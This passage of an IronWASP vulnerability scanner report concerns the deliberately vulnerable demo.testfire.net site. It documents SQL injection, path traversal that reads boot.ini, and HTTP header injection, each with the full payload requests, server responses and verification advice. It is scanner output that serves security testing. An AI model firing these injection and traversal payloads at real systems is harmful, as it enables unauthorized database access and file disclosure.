uid=q'+'qqq&passw=qqqq&btnSubmit=Login

Information about the Response from the Server:

This response is different from the response received for the payload that used the MS SQL concatenation syntax but similar to the response for the payload that used the Oracle concatenation syntax.

Reason 3:
IronWASP sent four payloads to the application with SQL code snippets in them.
Payload A - qqqqxxx' or 8=8--
Payload B - qqqqxxx' or 7=5--
Payload C - qqqqxxx' or 7=7--
Payload D - qqqqxxx' or 5=8--
Payload A and C have a boolean condition after the OR keyword that will evaluate to true. The boolean condition in Payload B and D would evaluate to false.
The responses for Payloads A and C were similar to each other and different from the responses received for Payloads B and D. This indicates that the application was actually evaluating the boolean condition in the payloads: Payloads A and C both carry a true condition, so their responses are similar, while Payloads B and D carry a false condition and so produce the other response.
If the application were not evaluating the boolean condition, all four payloads should have returned very similar responses. This therefore indicates that SQL syntax from the payload is executed as part of a SQL query on the server.
False Positive Check Assistance:
Manually analyze the responses received for the four payloads and confirm if the type of similarity explained above actually exists in them. Try resending the same payloads again but with different values in the boolean expression and check if this behaviour is repeated.
If you discover that this issue was a false positive then please consider reporting this to lava@ironwasp.org. Your feedback will help improve the accuracy of the scanner.
The relevant parts of the requests/responses pairs associated with the check explained in this reason section are available below.
Request sent by Scanner:

The payload in this request contains the conditional operator 'or' followed by the SQL condition 8=8-- which evaluates to true. The payload is qqqqxxx' or 8=8--

POST http://demo.testfire.net/bank/login.aspx HTTP/1.1
Host: demo.testfire.net
[---- Snipped parts of HTTP headers section for brevity ----]
Cookie: ASP.NET_SessionId=jqvyyuynupczguynihnhgg55;amSessionId=8200211786

uid=qqqqxxx'+or+8%3d8--&passw=qqqq&btnSubmit=Login

Information about the Response from the Server:

This response is the result of the first boolean true condition based payload. This response is equal to the response of the second boolean true condition payload and different from the responses of the boolean false condition payloads.

Request sent by Scanner:

The payload in this request contains the conditional operator 'or' followed by the SQL condition 7=5-- which evaluates to false. The payload is qqqqxxx' or 7=5--

POST http://demo.testfire.net/bank/login.aspx HTTP/1.1
Host: demo.testfire.net
[---- Snipped parts of HTTP headers section for brevity ----]
Cookie: ASP.NET_SessionId=jqvyyuynupczguynihnhgg55;amSessionId=8200211786

uid=qqqqxxx'+or+7%3d5--&passw=qqqq&btnSubmit=Login

Information about the Response from the Server:

This response is the result of the first boolean false condition based payload. This response is equal to the response of the second boolean false condition payload and different from the responses of the boolean true condition payloads.

Request sent by Scanner:

The payload in this request contains the conditional operator 'or' followed by the SQL condition 7=7-- which evaluates to true. The payload is qqqqxxx' or 7=7--

POST http://demo.testfire.net/bank/login.aspx HTTP/1.1
Host: demo.testfire.net
[---- Snipped parts of HTTP headers section for brevity ----]
Cookie: ASP.NET_SessionId=jqvyyuynupczguynihnhgg55;amSessionId=8200211786

uid=qqqqxxx'+or+7%3d7--&passw=qqqq&btnSubmit=Login

Information about the Response from the Server:

This response is the result of the second boolean true condition based payload. This response is equal to the response of the first boolean true condition payload and different from the responses of the boolean false condition payloads.

Request sent by Scanner:

The payload in this request contains the conditional operator 'or' followed by the SQL condition 5=8-- which evaluates to false. The payload is qqqqxxx' or 5=8--

POST http://demo.testfire.net/bank/login.aspx HTTP/1.1
Host: demo.testfire.net
[---- Snipped parts of HTTP headers section for brevity ----]
Cookie: ASP.NET_SessionId=jqvyyuynupczguynihnhgg55;amSessionId=8200211786

uid=qqqqxxx'+or+5%3d8--&passw=qqqq&btnSubmit=Login

Information about the Response from the Server:

This response is the result of the second boolean false condition based payload. This response is equal to the response of the first boolean false condition payload and different from the responses of the boolean true condition payloads.

SQL Injection Detected
Type:Vulnerability
Severity:High
Confidence:High
Found By:Active Scanning

Affected Site:http://demo.testfire.net/
Affected Url:/bank/login.aspx
Affected Parameter:passw
Parameter Location:Body
Description:
SQL Injection was identified in the passw parameter of the Body section of the scanned request.

SQL Injection is an issue where it is possible to execute SQL queries on the database being used on the server-side. For more details on this issue refer https://www.owasp.org/index.php/SQL_Injection

Reasons:
IronWASP has reported this issue because of the following reasons:
Reason 1:
IronWASP sent ' as payload to the application and the response that came back had the error message Syntax error in string in query expression. This error message is usually associated with SQL query related errors and it appears that the payload was able to break out of the data context and cause this error. This is an indication of SQL Injection.
False Positive Check Assistance:
Manually analyze the response received for the payload and confirm if the error message actually is because of some SQL related exception on the server-side. Try sending the same request without the payload and check if the error goes away.
If you discover that this issue was a false positive then please consider reporting this to lava@ironwasp.org. Your feedback will help improve the accuracy of the scanner.
The relevant parts of the requests/responses pairs associated with the check explained in this reason section are available below.
Request sent by Scanner:

The payload in this request is meant to trigger database error messages. The payload is '.

POST http://demo.testfire.net/bank/login.aspx HTTP/1.1
Host: demo.testfire.net
[---- Snipped parts of HTTP headers section for brevity ----]
Cookie: ASP.NET_SessionId=jqvyyuynupczguynihnhgg55;amSessionId=8200211786

uid=qqqq&passw='&btnSubmit=Login

Response from the Server:

This response contains database error messages.

HTTP/1.1 500 Internal Server Error
Connection: close
[---- Snipped parts of HTTP headers section for brevity ----]
Content-Length: 5464

[---- Snipped parts of HTTP body section for brevity ----]">


<div class="err" style="width: 99%;">

<h1>An Error Has Occurred</h1>

<h2>Summary:</h2>

<p><b><span id="_ctl0_Content_lblSummary">Syntax error in string in query expression 'username = 'qqqq' AND password = ''''. </span></b></p>

<h2>Error Message:</h2>

<p><span id="_ctl0_Content_lblDetails">System.Data.OleDb.OleDbE[---- Snipped parts of HTTP body section for brevity ----][---- Snipped parts of HTTP body section for brevity ----] = 'qqqq' AND password = ''''. </span></b></p>

<h2>Error Message:</h2>

<p><span id="_ctl0_Content_lblDetails">System.Data.OleDb.OleDbException: Syntax error in string in query expression 'username = 'qqqq' AND password = ''''.
at System.Data.OleDb.OleDbCommand.ExecuteCommandTextErrorHandling(OleDbHResult hr)
at System.Data.Ole[---- Snipped parts of HTTP body section for brevity ----]
Reason 2:
IronWASP sent ¿'"( as payload to the application and the response that came back had the error message Syntax error in string in query expression. This error message is usually associated with SQL query related errors and it appears that the payload was able to break out of the data context and cause this error. This is an indication of SQL Injection.
False Positive Check Assistance:
Manually analyze the response received for the payload and confirm if the error message actually is because of some SQL related exception on the server-side. Try sending the same request without the payload and check if the error goes away.
If you discover that this issue was a false positive then please consider reporting this to lava@ironwasp.org. Your feedback will help improve the accuracy of the scanner.
The relevant parts of the requests/responses pairs associated with the check explained in this reason section are available below.
Request sent by Scanner:

The payload in this request is meant to trigger database error messages. The payload is ¿'"(.

POST http://demo.testfire.net/bank/login.aspx HTTP/1.1
Host: demo.testfire.net
[---- Snipped parts of HTTP headers section for brevity ----]
Cookie: ASP.NET_SessionId=jqvyyuynupczguynihnhgg55;amSessionId=8200211786

uid=qqqq&passw=¿'"(&btnSubmit=Login

Response from the Server:

This response contains database error messages.

HTTP/1.1 500 Internal Server Error
Connection: close
[---- Snipped parts of HTTP headers section for brevity ----]
Content-Length: 5484

[---- Snipped parts of HTTP body section for brevity ----]">


<div class="err" style="width: 99%;">

<h1>An Error Has Occurred</h1>

<h2>Summary:</h2>

<p><b><span id="_ctl0_Content_lblSummary">Syntax error in string in query expression 'username = 'qqqq' AND password = '�'&quot;(''. </span></b></p>

<h2>Error Message:</h2>

<p><span id="_ctl0_Content_lblDetails">System.Data.OleD[---- Snipped parts of HTTP body section for brevity ----][---- Snipped parts of HTTP body section for brevity ----]' AND password = '�'&quot;(''. </span></b></p>

<h2>Error Message:</h2>

<p><span id="_ctl0_Content_lblDetails">System.Data.OleDb.OleDbException: Syntax error in string in query expression 'username = 'qqqq' AND password = '�'&quot;(''.
at System.Data.OleDb.OleDbCommand.ExecuteCommandTextErrorHandling(OleDbHResult hr)
at System.[---- Snipped parts of HTTP body section for brevity ----]
Reason 3:
IronWASP sent three payloads to the application with SQL code snippets in them.
Payload A - q'||'qqq
Payload B - q'+'qqq
Payload C - q' 'qqq
Payload A is trying to concatenate two strings as per the SQL syntax of Oracle database servers. Payload B is trying to concatenate the same two strings as per SQL syntax of MS SQL database servers. Payload C is trying to concatenate the same two strings as per the SQL syntax of MySQL database servers.
The responses for Payloads A and C were similar to each other and different from the response received for Payload B. This indicates that the application was actually trying to perform the string concatenation on the server-side and that the backend database in use is MS SQL. Since, in the case of an MS SQL database server, Payloads A and C would have simply thrown an invalid SQL syntax exception, their responses are similar. Payload B would have executed without this error and so its response was different from the other two.
If the application was not actually performing the concatenation then all three payloads should have received very similar responses. Therefore this indicates that SQL syntax from the payload is executed as part of the SQL query on the server.
False Positive Check Assistance:
Manually analyze the responses received for the three payloads and confirm if the type of similarity explained above actually exists in them. Try resending the same payloads again but with different strings and check if this behaviour is repeated.
If you discover that this issue was a false positive then please consider reporting this to lava@ironwasp.org. Your feedback will help improve the accuracy of the scanner.
The relevant parts of the requests/responses pairs associated with the check explained in this reason section are available below.
Request sent by Scanner:

The payload in this request tries to concatenate two strings as per Oracle database's syntax. The payload is q'||'qqq

POST http://demo.testfire.net/bank/login.aspx HTTP/1.1
Host: demo.testfire.net
[---- Snipped parts of HTTP headers section for brevity ----]
Cookie: ASP.NET_SessionId=jqvyyuynupczguynihnhgg55;amSessionId=8200211786

uid=qqqq&passw=q'%7c%7c'qqq&btnSubmit=Login

Information about the Response from the Server:

This response is different from the response received for the payload that used MS SQL database's concatenation syntax but similar to the response for the payload that used MySQL database's concatenation syntax.

Request sent by Scanner:

The payload in this request tries to concatenate two strings as per MS SQL database's syntax. The payload is q'+'qqq

POST http://demo.testfire.net/bank/login.aspx HTTP/1.1
Host: demo.testfire.net
[---- Snipped parts of HTTP headers section for brevity ----]
Cookie: ASP.NET_SessionId=jqvyyuynupczguynihnhgg55;amSessionId=8200211786

uid=qqqq&passw=q'%2b'qqq&btnSubmit=Login

Information about the Response from the Server:

This response is different from the responses received for the payloads that used MySQL and Oracle databases' concatenation syntax.

Request sent by Scanner:

The payload in this request tries to concatenate two strings as per MySQL database's syntax. The payload is q' 'qqq

POST http://demo.testfire.net/bank/login.aspx HTTP/1.1
Host: demo.testfire.net
[---- Snipped parts of HTTP headers section for brevity ----]
Cookie: ASP.NET_SessionId=jqvyyuynupczguynihnhgg55;amSessionId=8200211786

uid=qqqq&passw=q'+'qqq&btnSubmit=Login

Information about the Response from the Server:

This response is different from the response received for the payload that used MS SQL database's concatenation syntax but similar to the response for the payload that used Oracle database's concatenation syntax.

Reason 4:
IronWASP sent four payloads to the application with SQL code snippets in them.
Payload A - qqqqxxx' or 8=8--
Payload B - qqqqxxx' or 7=5--
Payload C - qqqqxxx' or 7=7--
Payload D - qqqqxxx' or 5=8--
Payload A and C have a boolean condition after the OR keyword that will evaluate to true. The boolean condition in Payload B and D would evaluate to false.
The responses for Payloads A and C were similar to each other and different from the responses received for Payloads B and D. This indicates that the application was actually evaluating the boolean condition in the payloads: since Payloads A and C both have a true boolean condition their responses are similar, while Payloads B and D both had a false boolean condition.
If the application was not actually evaluating the boolean condition then all four payloads should have returned very similar responses. Therefore this indicates that SQL syntax from the payload is executed as part of the SQL query on the server.
False Positive Check Assistance:
Manually analyze the responses received for the four payloads and confirm if the type of similarity explained above actually exists in them. Try resending the same payloads again but with different values in the boolean expression and check if this behaviour is repeated.
If you discover that this issue was a false positive then please consider reporting this to lava@ironwasp.org. Your feedback will help improve the accuracy of the scanner.
The relevant parts of the requests/responses pairs associated with the check explained in this reason section are available below.
Request sent by Scanner:

The payload in this request contains the conditional operator 'or' followed by the SQL condition 8=8-- which evaluates to true. The payload is qqqqxxx' or 8=8--

POST http://demo.testfire.net/bank/login.aspx HTTP/1.1
Host: demo.testfire.net
[---- Snipped parts of HTTP headers section for brevity ----]
Cookie: ASP.NET_SessionId=jqvyyuynupczguynihnhgg55;amSessionId=8200211786

uid=qqqq&passw=qqqqxxx'+or+8%3d8--&btnSubmit=Login

Information about the Response from the Server:

This response is the result of the first boolean true condition based payload. This response is equal to the response of the second boolean true condition payload and different from the responses of the boolean false condition payloads.

Request sent by Scanner:

The payload in this request contains the conditional operator 'or' followed by the SQL condition 7=5-- which evaluates to false. The payload is qqqqxxx' or 7=5--

POST http://demo.testfire.net/bank/login.aspx HTTP/1.1
Host: demo.testfire.net
[---- Snipped parts of HTTP headers section for brevity ----]
Cookie: ASP.NET_SessionId=jqvyyuynupczguynihnhgg55;amSessionId=8200211786

uid=qqqq&passw=qqqqxxx'+or+7%3d5--&btnSubmit=Login

Information about the Response from the Server:

This response is the result of the first boolean false condition based payload. This response is equal to the response of the second boolean false condition payload and different from the responses of the boolean true condition payloads.

Request sent by Scanner:

The payload in this request contains the conditional operator 'or' followed by the SQL condition 7=7-- which evaluates to true. The payload is qqqqxxx' or 7=7--

POST http://demo.testfire.net/bank/login.aspx HTTP/1.1
Host: demo.testfire.net
[---- Snipped parts of HTTP headers section for brevity ----]
Cookie: ASP.NET_SessionId=jqvyyuynupczguynihnhgg55;amSessionId=8200211786

uid=qqqq&passw=qqqqxxx'+or+7%3d7--&btnSubmit=Login

Information about the Response from the Server:

This response is the result of the second boolean true condition based payload. This response is equal to the response of the first boolean true condition payload and different from the responses of the boolean false condition payloads.

Request sent by Scanner:

The payload in this request contains the conditional operator 'or' followed by the SQL condition 5=8-- which evaluates to false. The payload is qqqqxxx' or 5=8--

POST http://demo.testfire.net/bank/login.aspx HTTP/1.1
Host: demo.testfire.net
[---- Snipped parts of HTTP headers section for brevity ----]
Cookie: ASP.NET_SessionId=jqvyyuynupczguynihnhgg55;amSessionId=8200211786

uid=qqqq&passw=qqqqxxx'+or+5%3d8--&btnSubmit=Login

Information about the Response from the Server:

This response is the result of the second boolean false condition based payload. This response is equal to the response of the first boolean false condition payload and different from the responses of the boolean true condition payloads.

Reason 5:
IronWASP sent four payloads to the application with SQL code snippets in them.
Payload A - qqqqxxx' or 's'='s
Payload B - qqqqxxx' or 's'='r
Payload C - qqqqxxx' or 't'='t
Payload D - qqqqxxx' or 't'='r
Payload A and C have a boolean condition after the OR keyword that will evaluate to true. The boolean condition in Payload B and D would evaluate to false.
The responses for Payloads A and C were similar to each other and different from the responses received for Payloads B and D. This indicates that the application was actually evaluating the boolean condition in the payloads: since Payloads A and C both have a true boolean condition their responses are similar, while Payloads B and D both had a false boolean condition.
If the application was not actually evaluating the boolean condition then all four payloads should have returned very similar responses. Therefore this indicates that SQL syntax from the payload is executed as part of the SQL query on the server.
False Positive Check Assistance:
Manually analyze the responses received for the four payloads and confirm if the type of similarity explained above actually exists in them. Try resending the same payloads again but with different values in the boolean expression and check if this behaviour is repeated.
If you discover that this issue was a false positive then please consider reporting this to lava@ironwasp.org. Your feedback will help improve the accuracy of the scanner.
The relevant parts of the requests/responses pairs associated with the check explained in this reason section are available below.
Request sent by Scanner:

The payload in this request contains the conditional operator 'or' followed by the SQL condition 's'='s which evaluates to true. The payload is qqqqxxx' or 's'='s

POST http://demo.testfire.net/bank/login.aspx HTTP/1.1
Host: demo.testfire.net
[---- Snipped parts of HTTP headers section for brevity ----]
Cookie: ASP.NET_SessionId=jqvyyuynupczguynihnhgg55;amSessionId=8200211786

uid=qqqq&passw=qqqqxxx'+or+'s'%3d's&btnSubmit=Login

Information about the Response from the Server:

This response is the result of the first boolean true condition based payload. This response is equal to the response of the second boolean true condition payload and different from the responses of the boolean false condition payloads.

Request sent by Scanner:

The payload in this request contains the conditional operator 'or' followed by the SQL condition 's'='r which evaluates to false. The payload is qqqqxxx' or 's'='r

POST http://demo.testfire.net/bank/login.aspx HTTP/1.1
Host: demo.testfire.net
[---- Snipped parts of HTTP headers section for brevity ----]
Cookie: ASP.NET_SessionId=jqvyyuynupczguynihnhgg55;amSessionId=8200211786

uid=qqqq&passw=qqqqxxx'+or+'s'%3d'r&btnSubmit=Login

Information about the Response from the Server:

This response is the result of the first boolean false condition based payload. This response is equal to the response of the second boolean false condition payload and different from the responses of the boolean true condition payloads.

Request sent by Scanner:

The payload in this request contains the conditional operator 'or' followed by the SQL condition 't'='t which evaluates to true. The payload is qqqqxxx' or 't'='t

POST http://demo.testfire.net/bank/login.aspx HTTP/1.1
Host: demo.testfire.net
[---- Snipped parts of HTTP headers section for brevity ----]
Cookie: ASP.NET_SessionId=jqvyyuynupczguynihnhgg55;amSessionId=8200211786

uid=qqqq&passw=qqqqxxx'+or+'t'%3d't&btnSubmit=Login

Information about the Response from the Server:

This response is the result of the second boolean true condition based payload. This response is equal to the response of the first boolean true condition payload and different from the responses of the boolean false condition payloads.

Request sent by Scanner:

The payload in this request contains the conditional operator 'or' followed by the SQL condition 't'='r which evaluates to false. The payload is qqqqxxx' or 't'='r

POST http://demo.testfire.net/bank/login.aspx HTTP/1.1
Host: demo.testfire.net
[---- Snipped parts of HTTP headers section for brevity ----]
Cookie: ASP.NET_SessionId=jqvyyuynupczguynihnhgg55;amSessionId=8200211786

uid=qqqq&passw=qqqqxxx'+or+'t'%3d'r&btnSubmit=Login

Information about the Response from the Server:

This response is the result of the second boolean false condition based payload. This response is equal to the response of the first boolean false condition payload and different from the responses of the boolean true condition payloads.

Local File Include Found
Type:Vulnerability
Severity:High
Confidence:High
Found By:Active Scanning

Affected Site:http://demo.testfire.net/
Affected Url:/default.aspx?content=inside_contact.htm
Affected Parameter:content
Parameter Location:Query
Description:
Local File Include/Path Traversal was identified in the content parameter of the Query section of the scanned request.

Local File Include is an issue where it is possible to load and view the raw contents of any file present on the web server. For more details on this issue refer https://www.owasp.org/index.php/Path_Traversal

Reasons:
IronWASP has reported this issue because of the following reasons:
Reason 1:
IronWASP sent ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\boot.ini\0.htm as payload to the application. This payload tries to refer to the file boot.ini by traversing from the current directory with a series of ..\. If the application is vulnerable it will load the boot.ini file and send its contents in the response. The response that came back from the application after the payload was injected had the text [boot loader], which is usually found in boot.ini files. This indicates that the boot.ini file was loaded and its content printed in the response.
False Positive Check Assistance:
To check if this was a valid case or a false positive you can first manually look at the response sent for this payload and determine if it actually contains the contents of the boot.ini file. After that you can try changing the file name to something else and see if the server prints those file contents.
If you discover that this issue was a false positive then please consider reporting this to lava@ironwasp.org. Your feedback will help improve the accuracy of the scanner.
The relevant parts of the requests/responses pairs associated with the check explained in this reason section are available below.
Request sent by Scanner:

The payload in this request refers to the boot.ini file by traversing upwards in the directory structure. The payload is ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\boot.ini\0.htm

GET http://demo.testfire.net/default.aspx?content=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cboot.ini%00.htm HTTP/1.1
Host: demo.testfire.net
[---- Snipped parts of HTTP headers section for brevity ----]
Cookie: ASP.NET_SessionId=jqvyyuynupczguynihnhgg55;amSessionId=8200211786



Response from the Server:

This response contains the contents of the boot.ini file. This was caused by the payload.

HTTP/1.1 200 OK
Date: Mon, 16 Sep 2013 15:24:17 GMT
[---- Snipped parts of HTTP headers section for brevity ----]
Content-Length: 7570

[---- Snipped parts of HTTP body section for brevity ----]s.htm">Careers</a></li>
</ul>
</td>
<td valign="top" colspan="3" class="bb">

<span id="_ctl0__ctl0_Content_Main_lblContent">[boot loader]
timeout=30
default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS
[operating systems]
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Windows Server 2003, [---- Snipped parts of HTTP body section for brevity ----]
Reason 2:
IronWASP sent ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\boot.ini\0.txt as payload to the application. This payload tries to refer to the file boot.ini by traversing from the current directory with a series of ..\. If the application is vulnerable it will load the boot.ini file and send its contents in the response. The response that came back from the application after the payload was injected had the text [boot loader], which is usually found in boot.ini files. This indicates that the boot.ini file was loaded and its content printed in the response.
False Positive Check Assistance:
To check if this was a valid case or a false positive you can first manually look at the response sent for this payload and determine if it actually contains the contents of the boot.ini file. After that you can try changing the file name to something else and see if the server prints those file contents.
If you discover that this issue was a false positive then please consider reporting this to lava@ironwasp.org. Your feedback will help improve the accuracy of the scanner.
The relevant parts of the requests/responses pairs associated with the check explained in this reason section are available below.
Request sent by Scanner:

The payload in this request refers to the boot.ini file by traversing upwards in the directory structure. The payload is ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\boot.ini\0.txt

GET http://demo.testfire.net/default.aspx?content=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cboot.ini%00.txt HTTP/1.1
Host: demo.testfire.net
[---- Snipped parts of HTTP headers section for brevity ----]
Cookie: ASP.NET_SessionId=jqvyyuynupczguynihnhgg55;amSessionId=8200211786



Response from the Server:

This response contains the contents of the boot.ini file. This was caused by the payload.

HTTP/1.1 200 OK
Date: Mon, 16 Sep 2013 15:24:19 GMT
[---- Snipped parts of HTTP headers section for brevity ----]
Content-Length: 7570

[---- Snipped parts of HTTP body section for brevity ----]s.htm">Careers</a></li>
</ul>
</td>
<td valign="top" colspan="3" class="bb">

<span id="_ctl0__ctl0_Content_Main_lblContent">[boot loader]
timeout=30
default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS
[operating systems]
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Windows Server 2003, [---- Snipped parts of HTTP body section for brevity ----]
Reason 3:
IronWASP sent four payloads to the application.
Payload A - aa/../inside_contact.htm
Payload B - aa../inside_contact.htm
Payload C - bb/../inside_contact.htm
Payload D - bb../inside_contact.htm

Payloads A and C are similar in nature. They both refer to the file inside_contact.htm by including an imaginary directory in the path (aa & bb) but then also invalidating it by traversing upwards by one directory using ../. So these payloads must have the same effect as referring to the file inside_contact.htm normally.
Payloads B and D are similar to each other but different from A & C. They refer to the file inside_contact.htm inside invalid directories (aa & bb).
If the application is vulnerable to Local File Include then the responses for Payloads A & C must be similar to each other and different from the responses for Payloads B & D. The responses for the injected payloads were analyzed and it was found that Payloads A & C got similar looking responses that were also different from the responses received for Payloads B & D, thereby indicating the presence of this vulnerability.
False Positive Check Assistance:
To check if this was a valid case or a false positive you can first manually look at the responses received for Payloads A, B, C and D. Analyze these payloads and verify if indeed A & C got similar responses and were different from B & D. You can also change the payloads for A & C by adding one more invalid directory and one more ../ to invalidate that directory. This must get the same response as the responses for A & C.
If you discover that this issue was a false positive then please consider reporting this to lava@ironwasp.org. Your feedback will help improve the accuracy of the scanner.
The relevant parts of the requests/responses pairs associated with the check explained in this reason section are available below.
Request sent by Scanner:

This payload refers to the inside_contact.htm file by doing a proper upward directory traversal of a dummy directory 'aa'. The payload is aa/../inside_contact.htm

GET http://demo.testfire.net/default.aspx?content=aa%2f..%2finside_contact.htm HTTP/1.1
Host: demo.testfire.net
[---- Snipped parts of HTTP headers section for brevity ----]
Cookie: ASP.NET_SessionId=jqvyyuynupczguynihnhgg55;amSessionId=8200211786



Information about the Response from the Server:

The contents of this response are different from the response of the next trigger but are similar to the response of the trigger after the next.

Request sent by Scanner:

This payload does not do a proper upward directory traversal of the dummy directory 'aa' and so does not refer to the inside_contact.htm file. The payload is aa../inside_contact.htm

GET http://demo.testfire.net/default.aspx?content=aa..%2finside_contact.htm HTTP/1.1
Host: demo.testfire.net
[---- Snipped parts of HTTP headers section for brevity ----]
Cookie: ASP.NET_SessionId=jqvyyuynupczguynihnhgg55;amSessionId=8200211786



Information about the Response from the Server:

The contents of this response are different from the response of the previous trigger but are similar to the response of the trigger after the next.

Request sent by Scanner:

This payload refers to the inside_contact.htm file by doing a proper upward directory traversal of a dummy directory 'bb'. The payload is bb/../inside_contact.htm

GET http://demo.testfire.net/default.aspx?content=bb%2f..%2finside_contact.htm HTTP/1.1
Host: demo.testfire.net
[---- Snipped parts of HTTP headers section for brevity ----]
Cookie: ASP.NET_SessionId=jqvyyuynupczguynihnhgg55;amSessionId=8200211786



Information about the Response from the Server:

The contents of this response are different from the response of the next trigger but are similar to the response of the trigger before the previous.

Request sent by Scanner:

This payload does not do a proper upward directory traversal of the dummy directory 'bb' and so does not refer to the inside_contact.htm file. The payload is bb../inside_contact.htm

GET http://demo.testfire.net/default.aspx?content=bb..%2finside_contact.htm HTTP/1.1
Host: demo.testfire.net
[---- Snipped parts of HTTP headers section for brevity ----]
Cookie: ASP.NET_SessionId=jqvyyuynupczguynihnhgg55;amSessionId=8200211786



Information about the Response from the Server:

The contents of this response are different from the response of the previous trigger but are similar to the response of the trigger before the previous.

Reason 4:
IronWASP sent four payloads to the application.
Payload A - aa\..\inside_contact.htm
Payload B - aa..\inside_contact.htm
Payload C - bb\..\inside_contact.htm
Payload D - bb..\inside_contact.htm

Payloads A and C are similar in nature. They both refer to the file inside_contact.htm by including an imaginary directory in the path (aa & bb) but then also invalidating it by traversing upwards by one directory using ..\. So these payloads must have the same effect as referring to the file inside_contact.htm normally.
Payloads B and D are similar to each other but different from A & C. They refer to the file inside_contact.htm inside invalid directories (aa & bb).
If the application is vulnerable to Local File Include then the response for Payloads A & C must be similar to each other and different from the responses for Payloads B & D. The responses for the injected payloads were analyzed and it was found that Payloads A & C got a similar looking response, which was also different from the responses received for Payloads B & D, thereby indicating the presence of this vulnerability.
False Positive Check Assistance:
To check if this was a valid case or a false positive you can first manually look at the responses received for Payloads A, B, C and D. Analyze these responses and verify that A & C indeed got similar responses that differ from those for B & D. You can also change the payloads for A & C by adding one more invalid directory and one more ..\ to invalidate that directory. This must get the same response as the responses for A & C.
If you discover that this issue was a false positive then please consider reporting this to lava@ironwasp.org. Your feedback will help improve the accuracy of the scanner.
The relevant parts of the requests/responses pairs associated with the check explained in this reason section are available below.
Request sent by Scanner:

This payload refers to the inside_contact.htm file by doing a proper upward directory traversal of a dummy directory 'aa'. The payload is aa\..\inside_contact.htm

GET http://demo.testfire.net/default.aspx?content=aa%5c..%5cinside_contact.htm HTTP/1.1
Host: demo.testfire.net
[---- Snipped parts of HTTP headers section for brevity ----]
Cookie: ASP.NET_SessionId=jqvyyuynupczguynihnhgg55;amSessionId=8200211786



Information about the Response from the Server:

The contents of this response are different from the response of the next trigger but are similar to the response of the trigger after the next.

Request sent by Scanner:

This payload does not do a proper upward directory traversal of the dummy directory 'aa' and so does not refer to the inside_contact.htm file. The payload is aa..\inside_contact.htm

GET http://demo.testfire.net/default.aspx?content=aa..%5cinside_contact.htm HTTP/1.1
Host: demo.testfire.net
[---- Snipped parts of HTTP headers section for brevity ----]
Cookie: ASP.NET_SessionId=jqvyyuynupczguynihnhgg55;amSessionId=8200211786



Information about the Response from the Server:

The contents of this response are different from the response of the previous trigger but are similar to the response of the trigger after the next.

Request sent by Scanner:

This payload refers to the inside_contact.htm file by doing a proper upward directory traversal of a dummy directory 'bb'. The payload is bb\..\inside_contact.htm

GET http://demo.testfire.net/default.aspx?content=bb%5c..%5cinside_contact.htm HTTP/1.1
Host: demo.testfire.net
[---- Snipped parts of HTTP headers section for brevity ----]
Cookie: ASP.NET_SessionId=jqvyyuynupczguynihnhgg55;amSessionId=8200211786



Information about the Response from the Server:

The contents of this response are different from the response of the next trigger but are similar to the response of the trigger before the previous.

Request sent by Scanner:

This payload does not do a proper upward directory traversal of the dummy directory 'bb' and so does not refer to the inside_contact.htm file. The payload is bb..\inside_contact.htm

GET http://demo.testfire.net/default.aspx?content=bb..%5cinside_contact.htm HTTP/1.1
Host: demo.testfire.net
[---- Snipped parts of HTTP headers section for brevity ----]
Cookie: ASP.NET_SessionId=jqvyyuynupczguynihnhgg55;amSessionId=8200211786



Information about the Response from the Server:

The contents of this response are different from the response of the previous trigger but are similar to the response of the trigger before the previous.

Header Injection Found
Type:Vulnerability
Severity:High
Confidence:High
Found By:Active Scanning

Affected Site:http://demo.testfire.net/
Affected Url:/bank/customize.aspx?lang=international
Affected Parameter:lang
Parameter Location:Query
Description:
Header Injection was identified in the lang parameter of the Query section of the scanned request.

Header Injection is an issue where it is possible to inject a new HTTP Header in the response from the application. For more details on this issue refer http://en.wikipedia.org/wiki/HTTP_header_injection

Reasons:
IronWASP has reported this issue because of the following reason:
Reason:
IronWASP sent \r\nNeww: Headerr as payload to the application. This payload has CRLF characters followed by the string Neww: Headerr, which is in the format of an HTTP header with name Neww and value Headerr. The response that came back from the application after injecting this payload has an HTTP header named Neww. This indicates that our payload caused an HTTP header to be injected in the response.
False Positive Check Assistance:
To check if this was a valid case or a false positive you can send the same payload but with different values for the header name part of the payload. If the response contains any HTTP headers with the specified names then there actually is Header Injection.
If you discover that this issue was a false positive then please consider reporting this to lava@ironwasp.org. Your feedback will help improve the accuracy of the scanner.
The relevant parts of the requests/responses pairs associated with the check explained in this reason section are available below.
Request sent by Scanner:

The payload in this request attempts to insert a header with name 'Neww' in the response. The payload is \r\nNeww: Headerr

GET http://demo.testfire.net/bank/customize.aspx?lang=%0d%0aNeww%3a+Headerr HTTP/1.1
Host: demo.testfire.net
[---- Snipped parts of HTTP headers section for brevity ----]
Cookie: ASP.NET_SessionId=jqvyyuynupczguynihnhgg55;amSessionId=8200211786;amUserId=;amCreditOffer=;lang=



Response from the Server:

This response has a header named 'Neww' which was added because of the payload

HTTP/1.1 200 OK
Date: Mon, 16 Sep 2013 15:45:47 GMT
[---- Snipped parts of HTTP headers section for brevity ----]
Neww: Headerr; path=/
[---- Snipped parts of HTTP headers section for brevity ----]
Content-Length: 5895

[---- Snipped parts of HTTP body section for brevity ----]A2OTMxMDA4ZGQ=" />

<p>
<span id="_ctl0__ctl0_Content_Main_Label1">Curent Language: </span>
<span id="_ctl0__ctl0_Content_Main_langLabel">
Neww: Headerr</span>
</p>

<p>
<span id="_ctl0__ctl0_Content_Main_Label2">You can change the language setting by choosing:</span>
</p>

<p>
<a [---- Snipped parts of HTTP body section for brevity ----]
XPATH Injection Found
Type:Vulnerability
Severity:High
Confidence:High
Found By:Active Scanning

Affected Site:http://demo.testfire.net/
